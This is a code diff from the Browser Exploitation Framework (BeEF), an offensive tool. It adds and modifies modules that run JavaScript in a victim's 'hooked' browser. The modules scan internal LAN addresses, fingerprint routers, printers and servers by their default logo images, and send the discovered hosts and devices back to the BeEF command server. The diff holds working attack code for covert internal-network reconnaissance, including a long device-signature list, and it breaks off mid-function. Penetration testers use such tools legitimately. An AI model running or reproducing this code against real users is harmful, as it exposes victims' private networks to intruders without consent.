category: "Network"
name: "Identify LAN Subnets"
description: "Discover active hosts in the internal network(s) of the hooked browser. This module works by attempting to connect to commonly used LAN IP addresses and timing the response."
authors: ["browserhacker.com"]
target:
working: ["FF", "C"]
not_working: ["IE", "S", "O"]

48
modules/network/identify_lan_subnets/module.rb Normal file
View File

@@ -0,0 +1,48 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
##
# Ported to BeEF from: http://browserhacker.com/code/Ch10/index.html
##
class Identify_lan_subnets < BeEF::Core::Command
def self.options
return [
{'name' => 'timeout', 'ui_label' => 'Timeout for each request (ms)', 'value' => '500'}
]
end
def post_execute
content = {}
content['host'] = @datastore['host'] if not @datastore['host'].nil?
content['hosts'] = @datastore['hosts'] if not @datastore['hosts'].nil?
if content.empty?
content['fail'] = 'No active hosts have been discovered.'
end
save content
configuration = BeEF::Core::Configuration.instance
if configuration.get("beef.extension.network.enable") == true
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
# log the network hosts
if @datastore['results'] =~ /^hosts=([\d\.,]+)/
hosts = "#{$1}"
hosts.split(',').flatten.each do |ip|
next if ip.nil?
next unless ip.to_s =~ /^([\d\.]+)$/
print_debug("Hooked browser found host #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
r.save
end
end
end
end
end

68
modules/network/internal_network_fingerprinting/command.js
View File

@@ -17,19 +17,8 @@ beef.execute(function() {
ports = ports.split(',');
}
// set target LAN IP addresses
if (ipRange != null){
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (i=lowerBound;i<=upperBound;i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
} else {
// set target IP addresses
if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
@@ -49,6 +38,23 @@ beef.execute(function() {
'192.168.10.1',
'192.168.10.254'
];
} else {
// set target IP range
var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
return;
}
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (i=lowerBound;i<=upperBound;i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
}
/* Signatures in the form of:
@@ -106,6 +112,10 @@ beef.execute(function() {
"Billion Router",
"80","http",false,
"/customized/logo.gif",224,55),
new Array(
"Netgear N300 Router",
"80","http",false,
"/settings.gif",750,85),
new Array(
"Linksys NAS",
"80","http",false,
@@ -198,6 +208,14 @@ beef.execute(function() {
"HP Printer Photosmart series",
"80","http",false,
"/webApps/images/hp_d_rgb_m.gif",50,50),
new Array(
"Lexmark Printer",
"80","http",false,
"/images/lexlogo.gif",153,115),
new Array(
"Canon Printer",
"8000","http",false,
"/login/image/canonlogo.gif",100,37),
new Array(
"Zenoss",
"8080","http",false,
@@ -214,22 +232,40 @@ beef.execute(function() {
"pfSense",
"443","https",false,
"/themes/pfsense_ng/images/logo.gif",200,56),
new Array(
"Apache Tomcat",
"8080","http",true,
"/docs/images/tomcat.gif",146,92),
new Array(
"Jenkins",
"80","http",false,
"/static/"+Math.random().toString(36).substring(2,10)+"/images/jenkins.png",240,323),
new Array(
"SAP NetWeaver",
"80","http",true,
"/logon/layout/shadow.jpg",18,4),
new Array(
"Netscape iPlanet",
"80","http",true,
"/mc-icons/menu.gif",21,18),
new Array(
"m0n0wall",
"80","http",false,
"/logo.gif",150,47)
"/logo.gif",150,47),
new Array("SMC Router","80","http",false,"/images/logo.gif",133,59)
// Uncommon signatures
//new Array("Citrix MetaFrame", "80", "http", false, "/Citrix/MetaFrameXP/default/media/nfusehead.gif",230,41),
//new Array("Oracle E-Business Suite","80","http",false,"/OA_MEDIA/FNDSSCORP.gif",134,31),
//new Array("OracleAS Reports Service","80","http",false,"/reports/images/oraclelogo_sizewithprodbrand.gif",133,20),
//new Array("Oracle iLearning","80","http",false,"/ilearn/en/shared/img/coin_help_ready.gif",60,32),
//new Array("RSA Self-Service Console", "80", "http",false,"/console-selfservice/images/default/icn_help.gif",14,14),
//new Array("Sambar Server", "80", "http",false,"/sysimage/system/powerby.gif",41,23),
//new Array("BeEF","3000","http",false,"/ui/media/images/beef.png",200,149),
//new Array("BeEF (PHP)","80","http",false,"/beef/images/beef.gif",32,32),
//new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
//new Array("Alt-N MDaemon World Client","3000","http",false,"/LookOut/biglogo.gif",342,98),
//new Array("VLC Media Player","8080","http",false,"/images/white_cross_small.png",9,9),
//new Array("SMC Networks","80","http",false,"/images/logo.gif",133,59),
//new Array("Syncrify","5800","http",false,"/images/468x60.gif",468,60),
//new Array("Winamp Web Interface","80","http",false,"/img?image=121",30,30),
);
@@ -244,7 +280,7 @@ beef.execute(function() {
img.onerror = function() { dom.removeChild(this); }
img.onload = function() {
if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) {
beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+signature_name+"&url="+escape(this.src));dom.removeChild(this);
beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+'&discovered='+signature_name+"&url="+escape(this.src));dom.removeChild(this);
beef.debug("[Network Fingerprint] Found [" + signature_name + "] with URL [" + escape(this.src) + "]");
}
}

2
modules/network/internal_network_fingerprinting/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Fingerprint Local Network"
description: "Discover devices and applications in the victim's Local Area Network.<br/><br/>This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.<br/><br/>Partially based on <a href='http://yokoso.inguardians.com/'>Yokosou</a> and <a href='http://code.google.com/p/jslanscanner/'>jslanscanner</a>."
description: "Discover devices and applications in the victim's Local Area Network.<br/><br/>This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.<br/><br/>Partially based on <a href='http://yokoso.inguardians.com/'>Yokosou</a> and <a href='http://code.google.com/p/jslanscanner/'>jslanscanner</a>.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles", "wade", "antisnatchor"]
target:
user_notify: ["FF", "IE", "C", "S"]

20
modules/network/internal_network_fingerprinting/module.rb
View File

@@ -24,5 +24,25 @@ class Internal_network_fingerprinting < BeEF::Core::Command
content['fail'] = 'No devices/applications have been discovered.'
end
save content
configuration = BeEF::Core::Configuration.instance
if configuration.get("beef.extension.network.enable") == true
if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&discovered=(.+)&url=(.+)/
proto = $1
ip = $2
port = $3
discovered = $4
url = $5
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
if !ip.nil?
print_debug("Hooked browser found '#{discovered}' [ip: #{ip}]")
r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => discovered, :cid => cid)
r.save
end
end
end
end
end

410
modules/network/jslanscanner/command.js Normal file
View File

@@ -0,0 +1,410 @@
//
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Ported to BeEF from jslanscanner: https://code.google.com/p/jslanscanner/source/browse/trunk/lan_scan/js/lan_scan.js
beef.execute(function() {
if(!beef.browser.isFF() && !beef.browser.isS()){
beef.debug("[command #<%= @command_id %>] Browser is not supported.");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser");
}
//------------------------------------------------------------------------------------------
// LAN SCANNER created by Gareth Heyes (gareth at businessinfo co uk)
// Blog: www.thespanner.co.uk
// Labs site : www.businessinfo.co.uk
// Version 2.1
//------------------------------------------------------------------------------------------
/* Copyright 2007 Gareth Heyes (email : gareth[at]NOSPAM businessinfo(dot)(co)(dot)uk
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
var devices = [
{make:'DLink',model:'dgl4100',graphic:'/html/images/dgl4100.jpg'},
{make:'DLink',model:'dgl4300',graphic:'/html/images/dgl4300.jpg'},
{make:'DLink',model:'di524',graphic:'/html/images/di524.jpg'},
{make:'DLink',model:'di624',graphic:'/html/images/di624.jpg'},
{make:'DLink',model:'di624s',graphic:'/html/images/di624s.jpg'},
{make:'DLink',model:'di724gu',graphic:'/html/images/di724gu.jpg'},
{make:'DLink',model:'dilb604',graphic:'/html/images/dilb604.jpg'},
{make:'DLink',model:'dir130',graphic:'/html/images/dir130.jpg'},
{make:'DLink',model:'dir330',graphic:'/html/images/dir330.jpg'},
{make:'DLink',model:'dir450',graphic:'/html/images/dir450.jpg'},
{make:'DLink',model:'dir451',graphic:'/html/images/dir451.jpg'},
{make:'DLink',model:'dir615',graphic:'/html/images/dir615.jpg'},
{make:'DLink',model:'dir625',graphic:'/html/images/dir625.jpg'},
{make:'DLink',model:'dir635',graphic:'/html/images/dir635.jpg'},
{make:'DLink',model:'dir655',graphic:'/html/images/dir655.jpg'},
{make:'DLink',model:'dir660',graphic:'/html/images/dir660.jpg'},
{make:'DLink',model:'ebr2310',graphic:'/html/images/ebr2310.jpg'},
{make:'DLink',model:'kr1',graphic:'/html/images/kr1.jpg'},
{make:'DLink',model:'tmg5240',graphic:'/html/images/tmg5240.jpg'},
{make:'DLink',model:'wbr1310',graphic:'/html/images/wbr1310.jpg'},
{make:'DLink',model:'wbr2310',graphic:'/html/images/wbr2310.jpg'},
{make:'DLink',model:'dsl604',graphic:'/html/images/dsl604.jpg'},
{make:'DLink',model:'dsl2320b',graphic:'/html/images/dsl2320b.jpg'},
{make:'DLink',model:'dsl2540b',graphic:'/html/images/dsl2540b.jpg'},
{make:'DLink',model:'dsl2640b',graphic:'/html/images/dsl2640b.jpg'},
{make:'DLink',model:'dsl302g',graphic:'/html/images/dsl302g.jpg'},
{make:'DLink',model:'dsl502g',graphic:'/html/images/dsl502g.jpg'},
{make:'DLink',model:'dgl3420',graphic:'/html/images/dgl3420.jpg'},
{make:'DLink',model:'dwl2100ap',graphic:'/html/images/dwl2100ap.jpg'},
{make:'DLink',model:'dwl2130ap',graphic:'/html/images/dwl2130ap.jpg'},
{make:'DLink',model:'dwl2200ap',graphic:'/html/images/dwl2200ap.jpg'},
{make:'DLink',model:'dwl2230ap',graphic:'/html/images/dwl2230ap.jpg'},
{make:'DLink',model:'dwl2700ap',graphic:'/html/images/dwl2700ap.jpg'},
{make:'DLink',model:'dwl3200ap',graphic:'/html/images/dwl3200ap.jpg'},
{make:'DLink',model:'dwl7100ap',graphic:'/html/images/dwl7100ap.jpg'},
{make:'DLink',model:'dwl7130ap',graphic:'/html/images/dwl7130ap.jpg'},
{make:'DLink',model:'dwl7200ap',graphic:'/html/images/dwl7200ap.jpg'},
{make:'DLink',model:'dwl7230ap',graphic:'/html/images/dwl7230ap.jpg'},
{make:'DLink',model:'dwl7700ap',graphic:'/html/images/dwl7700ap.jpg'},
{make:'DLink',model:'dwl8200ap',graphic:'/html/images/dwl8200ap.jpg'},
{make:'DLink',model:'dwl8220ap',graphic:'/html/images/dwl8220ap.jpg'},
{make:'DLink',model:'dwlag132',graphic:'/html/images/dwlag132.jpg'},
{make:'DLink',model:'dwlag530',graphic:'/html/images/dwlag530.jpg'},
{make:'DLink',model:'dwlag660',graphic:'/html/images/dwlag660.jpg'},
{make:'DLink',model:'dwlag700ap',graphic:'/html/images/dwlag700ap.jpg'},
{make:'DLink',model:'dwlg120',graphic:'/html/images/dwlg120.jpg'},
{make:'DLink',model:'dwlg122',graphic:'/html/images/dwlg122.jpg'},
{make:'DLink',model:'dwlg132',graphic:'/html/images/dwlg132.jpg'},
{make:'DLink',model:'dwlg510',graphic:'/html/images/dwlg510.jpg'},
{make:'DLink',model:'dwlg520',graphic:'/html/images/dwlg520.jpg'},
{make:'DLink',model:'dwlg520m',graphic:'/html/images/dwlg520m.jpg'},
{make:'DLink',model:'dwlg550',graphic:'/html/images/dwlg550.jpg'},
{make:'DLink',model:'dwlg630',graphic:'/html/images/dwlg630.jpg'},
{make:'DLink',model:'dwlg650',graphic:'/html/images/dwlg650.jpg'},
{make:'DLink',model:'dwlg650m',graphic:'/html/images/dwlg650m.jpg'},
{make:'DLink',model:'dwlg680',graphic:'/html/images/dwlg680.jpg'},
{make:'DLink',model:'dwlg700ap',graphic:'/html/images/dwlg700ap.jpg'},
{make:'DLink',model:'dwlg710',graphic:'/html/images/dwlg710.jpg'},
{make:'DLink',model:'dwlg730ap',graphic:'/html/images/dwlg730ap.jpg'},
{make:'DLink',model:'dwlg820',graphic:'/html/images/dwlg820.jpg'},
{make:'DLink',model:'wda1320',graphic:'/html/images/wda1320.jpg'},
{make:'DLink',model:'wda2320',graphic:'/html/images/wda2320.jpg'},
{make:'DLink',model:'wna1330',graphic:'/html/images/wna1330.jpg'},
{make:'DLink',model:'wna2330',graphic:'/html/images/wna2330.jpg'},
{make:'DLink',model:'wua1340',graphic:'/html/images/wua1340.jpg'},
{make:'DLink',model:'wua2340',graphic:'/html/images/wua2340.jpg'},
{make:'DLink',model:'DSL502T',graphic:'/html/images/help_p.jpg'},
{make:'DLink',model:'DSL524T',graphic:'/html/images/device.gif'},
{make:'Netgear',model:'CG814WG',graphic:'/images/../settingsCG814WG.gif'},
{make:'Netgear',model:'CM212',graphic:'/images/../settingsCM212.gif'},
{make:'Netgear',model:'DG632',graphic:'/images/../settingsDG632.gif'},
{make:'Netgear',model:'DG632B',graphic:'/images/../settingsDG632B.gif'},
{make:'Netgear',model:'DG814',graphic:'/images/../settingsDG814.gif'},
{make:'Netgear',model:'DG824M',graphic:'/images/../settingsDG824M.gif'},
{make:'Netgear',model:'DG834',graphic:'/images/../settingsDG834.gif'},
{make:'Netgear',model:'DG834B',graphic:'/images/../settingsDG834B.gif'},
{make:'Netgear',model:'DG834G',graphic:'/images/../settingsDG834G.gif'},
{make:'Netgear',model:'DG834GB',graphic:'/images/../settingsDG834GB.gif'},
{make:'Netgear',model:'DG834GT',graphic:'/images/../settingsDG834GT.gif'},
{make:'Netgear',model:'DG834GTB',graphic:'/images/../settingsDG834GTB.gif'},
{make:'Netgear',model:'DG834GV',graphic:'/images/../settingsDG834GV.gif'},
{make:'Netgear',model:'dg834N',graphic:'/images/../settingsdg834N.gif'},
{make:'Netgear',model:'DG834PN',graphic:'/images/../settingsDG834PN.gif'},
{make:'Netgear',model:'DGFV338',graphic:'/images/../settingsDGFV338.gif'},
{make:'Netgear',model:'DM111P',graphic:'/images/../settingsDM111P.gif'},
{make:'Netgear',model:'DM602',graphic:'/images/../settingsDM602.gif'},
{make:'Netgear',model:'FM114P',graphic:'/images/../settingsFM114P.gif'},
{make:'Netgear',model:'FR114P',graphic:'/images/../settingsFR114P.gif'},
{make:'Netgear',model:'FR114W',graphic:'/images/../settingsFR114W.gif'},
{make:'Netgear',model:'FR314',graphic:'/images/../settingsFR314.gif'},
{make:'Netgear',model:'FR318',graphic:'/images/../settingsFR318.gif'},
{make:'Netgear',model:'FR328S',graphic:'/images/../settingsFR328S.gif'},
{make:'Netgear',model:'FV318',graphic:'/images/../settingsFV318.gif'},
{make:'Netgear',model:'FVG318',graphic:'/images/../settingsFVG318.gif'},
{make:'Netgear',model:'FVL328',graphic:'/images/../settingsFVL328.gif'},
{make:'Netgear',model:'FVM318',graphic:'/images/../settingsFVM318.gif'},
{make:'Netgear',model:'FVS114',graphic:'/images/../settingsFVS114.gif'},
{make:'Netgear',model:'FVS124G',graphic:'/images/../settingsFVS124G.gif'},
{make:'Netgear',model:'FVS318',graphic:'/images/../settingsFVS318.gif'},
{make:'Netgear',model:'FVS328',graphic:'/images/../settingsFVS328.gif'},
{make:'Netgear',model:'FVS338',graphic:'/images/../settingsFVS338.gif'},
{make:'Netgear',model:'FVX538',graphic:'/images/../settingsFVX538.gif'},
{make:'Netgear',model:'FWAG114',graphic:'/images/../settingsFWAG114.gif'},
{make:'Netgear',model:'FWG114P',graphic:'/images/../settingsFWG114P.gif'},
{make:'Netgear',model:'GA302T',graphic:'/images/../settingsGA302T.gif'},
{make:'Netgear',model:'GA311',graphic:'/images/../settingsGA311.gif'},
{make:'Netgear',model:'GA511',graphic:'/images/../settingsGA511.gif'},
{make:'Netgear',model:'GA620',graphic:'/images/../settingsGA620.gif'},
{make:'Netgear',model:'GA621',graphic:'/images/../settingsGA621.gif'},
{make:'Netgear',model:'GA622T',graphic:'/images/../settingsGA622T.gif'},
{make:'Netgear',model:'HE102',graphic:'/images/../settingsHE102.gif'},
{make:'Netgear',model:'HR314',graphic:'/images/../settingsHR314.gif'},
{make:'Netgear',model:'JFS516',graphic:'/images/../settingsJFS516.gif'},
{make:'Netgear',model:'JFS524',graphic:'/images/../settingsJFS524.gif'},
{make:'Netgear',model:'JFS524F',graphic:'/images/../settingsJFS524F.gif'},
{make:'Netgear',model:'JGS516',graphic:'/images/../settingsJGS516.gif'},
{make:'Netgear',model:'JGS524',graphic:'/images/../settingsJGS524.gif'},
{make:'Netgear',model:'JGS524F',graphic:'/images/../settingsJGS524F.gif'},
{make:'Netgear',model:'KWGR614',graphic:'/images/../settingsKWGR614.gif'},
{make:'Netgear',model:'ME101',graphic:'/images/../settingsME101.gif'},
{make:'Netgear',model:'ME102',graphic:'/images/../settingsME102.gif'},
{make:'Netgear',model:'ME103',graphic:'/images/../settingsME103.gif'},
{make:'Netgear',model:'MR314',graphic:'/images/../settingsMR314.gif'},
{make:'Netgear',model:'MR814',graphic:'/images/../settingsMR814.gif'},
{make:'Netgear',model:'RH340',graphic:'/images/../settingsRH340.gif'},
{make:'Netgear',model:'RH348',graphic:'/images/../settingsRH348.gif'},
{make:'Netgear',model:'RM356',graphic:'/images/../settingsRM356.gif'},
{make:'Netgear',model:'RO318',graphic:'/images/../settingsRO318.gif'},
{make:'Netgear',model:'RP114',graphic:'/images/../settingsRP114.gif'},
{make:'Netgear',model:'RP334',graphic:'/images/../settingsRP334.gif'},
{make:'Netgear',model:'RP614',graphic:'/images/../settingsRP614.gif'},
{make:'Netgear',model:'RT311',graphic:'/images/../settingsRT311.gif'},
{make:'Netgear',model:'RT314',graphic:'/images/../settingsRT314.gif'},
{make:'Netgear',model:'RT328',graphic:'/images/../settingsRT328.gif'},
{make:'Netgear',model:'RT338',graphic:'/images/../settingsRT338.gif'},
{make:'Netgear',model:'WAB102',graphic:'/images/../settingsWAB102.gif'},
{make:'Netgear',model:'WAG102',graphic:'/images/../settingsWAG102.gif'},
{make:'Netgear',model:'WAG302',graphic:'/images/../settingsWAG302.gif'},
{make:'Netgear',model:'WAGL102',graphic:'/images/../settingsWAGL102.gif'},
{make:'Netgear',model:'WAGR614',graphic:'/images/../settingsWAGR614.gif'},
{make:'Netgear',model:'WG102',graphic:'/images/../settingsWG102.gif'},
{make:'Netgear',model:'WG111',graphic:'/images/../settingsWG111.gif'},
{make:'Netgear',model:'WG111T',graphic:'/images/../settingsWG111T.gif'},
{make:'Netgear',model:'WG302',graphic:'/images/../settingsWG302.gif'},
{make:'Netgear',model:'WG311',graphic:'/images/../settingsWG311.gif'},
{make:'Netgear',model:'WG602',graphic:'/images/../settingsWG602.gif'},
{make:'Netgear',model:'WGE101',graphic:'/images/../settingsWGE101.gif'},
{make:'Netgear',model:'WGE111',graphic:'/images/../settingsWGE111.gif'},
{make:'Netgear',model:'WGL102',graphic:'/images/../settingsWGL102.gif'},
{make:'Netgear',model:'WGM124',graphic:'/images/../settingsWGM124.gif'},
{make:'Netgear',model:'WGR101',graphic:'/images/../settingsWGR101.gif'},
{make:'Netgear',model:'WGR614',graphic:'/images/../settingsWGR614.gif'},
{make:'Netgear',model:'WGT624',graphic:'/images/../settingsWGT624.gif'},
{make:'Netgear',model:'WGT624SC',graphic:'/images/../settingsWGT624SC.gif'},
{make:'Netgear',model:'WGT634U',graphic:'/images/../settingsWGT634U.gif'},
{make:'Netgear',model:'WGU624',graphic:'/images/../settingsWGU624.gif'},
{make:'Netgear',model:'WGX102',graphic:'/images/../settingsWGX102.gif'},
{make:'Netgear',model:'WN121T',graphic:'/images/../settingsWN121T.gif'},
{make:'Netgear',model:'WN311B',graphic:'/images/../settingsWN311B.gif'},
{make:'Netgear',model:'WN311T',graphic:'/images/../settingsWN311T.gif'},
{make:'Netgear',model:'WN511B',graphic:'/images/../settingsWN511B.gif'},
{make:'Netgear',model:'WN511T',graphic:'/images/../settingsWN511T.gif'},
{make:'Netgear',model:'WN802T',graphic:'/images/../settingsWN802T.gif'},
{make:'Netgear',model:'WNR834B',graphic:'/images/../settingsWNR834B.gif'},
{make:'Netgear',model:'WNR834M',graphic:'/images/../settingsWNR834M.gif'},
{make:'Netgear',model:'WNR854T',graphic:'/images/../settingsWNR854T.gif'},
{make:'Netgear',model:'WPN802',graphic:'/images/../settingsWPN802.gif'},
{make:'Netgear',model:'WPN824',graphic:'/images/../settingsWPN824.gif'},
{make:'Netgear',model:'XM128',graphic:'/images/../settingsXM128.gif'},
{make:'Thomson',model:'Cable Modem A801',graphic:'/images/thomson.gif'},
{make:'Vigor',model:'2600V',graphic:'/images/logo1.jpg'},
{make:'Linksys',model:'WRT54GL',graphic:'/WRT56GL.gif'},
{make:'Linksys',model:'WRT54GC',graphic:'/UI_Linksys.gif'},
{make:'Linksys',model:'WRT54G',graphic:'/WRT54G.gif'},
{make:'Linksys',model:'WRT54GS',graphic:'/UILinksys.gif'},
{make:'ZyXEL',model:'Prestige 660H61',graphic:'/dslroutery/imgshop/full/NETZ1431.jpg'},
{make:'ZyXEL',model:'Zywall',graphic:'/images/Logo.gif'},
{make:'Sitecom',model:'WL114',graphic:'/slogo.gif'},
{make:'2Wire',model:'1000 Series',graphic:'/base/web/def/def/images/nav_sl_logo.gif'},
{make:'SurfinBird',model:'313',graphic:'/images/help_p.gif'},
{make:'SMC',model:'7004ABR',graphic:'/images/logo.gif'},
{make:'DLink',model:'DI524',graphic:'/m524.gif'},
{make:'Cisco',model:'2600',graphic:'/images/logo.png'},
{make:'ASUS',model:'RT Series',graphic:'/images/EZSetup_button.gif'}
];
// No signatures for commented out IPs
var ips = [
{ip:'192.168.1.30',make:'DLink'},
{ip:'192.168.1.50',make:'DLink'},
{ip:'192.168.2.1',make:'SMC'},
//{ip:'192.168.2.1',make:'Accton'},
//{ip:'192.168.1.1',make:'3Com'},
//{ip:'192.168.1.1',make:'AirLink'},
//{ip:'192.168.1.1',make:'Arescom'},
//{ip:'192.168.1.1',make:'Teletronics'},
//{ip:'192.168.1.1',make:'Dell'},
{ip:'192.168.1.1',make:'DLink'},
{ip:'192.168.1.1',make:'Linksys'},
{ip:'192.168.1.1',make:'ZyXEL'},
{ip:'192.168.1.1',make:'ASUS'},
{ip:'192.168.0.1',make:'DLink'},
{ip:'192.168.0.1',make:'Netgear'},
{ip:'192.168.0.1',make:'Linksys'},
{ip:'192.168.0.1',make:'SurfinBird'},
{ip:'192.168.0.1',make:'ASUS'},
{ip:'192.168.0.227',make:'Netgear'},
{ip:'192.168.0.254',make:'DLink'},
{ip:'192.168.1.225',make:'Linksys'},
{ip:'192.168.1.226',make:'Linksys'},
{ip:'192.168.1.245',make:'Linksys'},
{ip:'192.168.1.246',make:'Linksys'},
{ip:'192.168.1.251',make:'Linksys'},
{ip:'192.168.100.1',make:'Thomson'},
{ip:'192.168.1.254',make:'ZyXEL'},
{ip:'192.168.1.254',make:'2Wire'},
{ip:'192.168.0.1',make:'Vigor'},
{ip:'192.168.123.254',make:'Sitecom'},
//{ip:'10.0.1.1',make:'Apple'},
{ip:'10.1.1.1',make:'DLink'},
{ip:'10.0.0.1',make:'ZyXEL'},
//{ip:'10.0.0.2',make:'Aceex'},
//{ip:'10.0.0.2',make:'Bausch'},
//{ip:'10.0.0.2',make:'E-Tech'},
//{ip:'10.0.0.2',make:'JAHT'},
{ip:'192.168.1.254',make:'2Wire'},
{ip:'192.168.65.1',make:'Cisco'}
//{ip:'192.168.100.1',make:'Motorola'},
//{ip:'192.168.100.1',make:'Ambit'},
];
var guesses = [
{host:'10.1.1.1',label:'Device',labelText:'DLink',port:80},
{host:'10.0.0.1',label:'Device',labelText:'ZyXEL',port:80},
{host:'10.0.0.2',label:'Device',labelText:'Aceex,Bausch,E-Tech,JAHT',port:80},
{host:'10.0.0.138',label:'Device',labelText:'Alcatel',port:80},
{host:'10.0.1.1',label:'Device',labelText:'Apple',port:80},
{host:'192.168.0.1',label:'Device',labelText:'DLink,Netgear,ASUS,Linksys,Sitecom,Belkin',port:80},
{host:'192.168.0.227',label:'Device',labelText:'Netgear',port:80},
{host:'192.168.0.254',label:'Device',labelText:'DLink,Sitecom/Linux IP Cop',port:80},
{host:'192.168.1.1',label:'Device',labelText:'3Com,AirLink,Linksys,Arescom,ASUS,Dell,DLink,ZyXEL,Teletronics',port:80},
{host:'192.168.1.30',label:'Device',labelText:'DLink',port:80},
{host:'192.168.1.50',label:'Device',labelText:'DLink,Linksys',port:80},
{host:'192.168.1.225',label:'Device',labelText:'Linksys',port:80},
{host:'192.168.1.226',label:'Device',labelText:'Linksys',port:80},
{host:'192.168.1.245',label:'Device',labelText:'Linksys',port:80},
{host:'192.168.1.246',label:'Device',labelText:'Linksys',port:80},
{host:'192.168.1.251',label:'Device',labelText:'Linksys',port:80},
{host:'192.168.1.254',label:'Device',labelText:'ZyXEL',port:80},
{host:'192.168.2.1',label:'Device',labelText:'Accton,Belkin,Microsoft,SMC',port:80},
{host:'192.168.2.25',label:'Device',labelText:'SMC',port:80},
{host:'192.168.8.1',label:'Device',labelText:'Aceex',port:80},
{host:'192.168.11.1',label:'Device',labelText:'Buffalo',port:80},
{host:'192.168.62.1',label:'Device',labelText:'Canyon',port:80},
{host:'192.168.100.1',label:'Device',labelText:'Ambit,Thomson,Motorola',port:80},
{host:'192.168.123.254',label:'Device',labelText:'US Robotics',port:80},
{host:'192.168.123.254',label:'Device',labelText:'Sitecom',port:80},
{host:'192.168.254.254',label:'Device',labelText:'Flowpoint',port:80},
{host:'192.168.254.1',label:'Device',labelText:'BT M5861,2Wire',port:80}
];
lanScanner = {timeout:1,probes:0};
//lol pardon the innuendo
lanScanner.handleProbe = function(portObj) {
if(portObj.init == 1) {
lanScanner.addDevice({host:portObj.host,make:portObj.make,model:portObj.model});
document.body.removeChild(portObj);
}
}
// ie sucks! onload doesn't work unless specified directly in the document
// that's why I have to do this :(
lanScanner.handleConnection = function(portObj) {
if(portObj.init == 1) {
if(beef.browser.isIE()) {
portObj.end = new Date().getTime();
if(portObj.end - portObj.start > 15000) {
document.body.removeChild(portObj);
return false;
}
}
var obj = portObj.store;
obj.status = 'Open';
lanScanner.addHost(obj);
document.body.removeChild(portObj);
} else {
portObj.start = new Date().getTime();
}
}
lanScanner.runScan = function() {
var obj, portObj;
guessesLen = guesses.length;
for(var i=0;i<guessesLen;i++) {
obj = guesses[i];
currentPort = obj.port;
currentAddress = obj.host+':'+currentPort;
beef.debug("[JS LAN Scanner] Connecting to: " + currentAddress);
portObj = document.getElementById('connection'+i);
portObj.src = 'http://'+currentAddress;
portObj.store = obj;
portObj.init = 1;
document.body.appendChild(portObj);
}
}
lanScanner.getPortName = function(port) {
var portNames = {'HTTP Server':80,'FTP Server':21};
for(var i in portNames) {
if(portNames[i] == port) {
return i;
}
}
return 'Unknown';
}
lanScanner.addHost = function(obj) {
this.timeout = 0;
beef.debug("[JS LAN Scanner] Found "+this.getPortName(obj.port)+" [proto: http, ip: "+obj.host+", port: "+obj.port+"]");
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'proto=http&ip='+obj.host+'&port='+obj.port+'&service='+this.getPortName(obj.port));
lanScanner.fingerPrint(obj.host);
}
lanScanner.addDevice = function(obj) {
beef.debug("[JS LAN Scanner] Found " + obj.make + ' ' + obj.model + ' [ip: ' + obj.host + ']');
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'ip='+obj.host+'&device='+obj.make+' '+obj.model);
}
lanScanner.destroyConnections = function() {
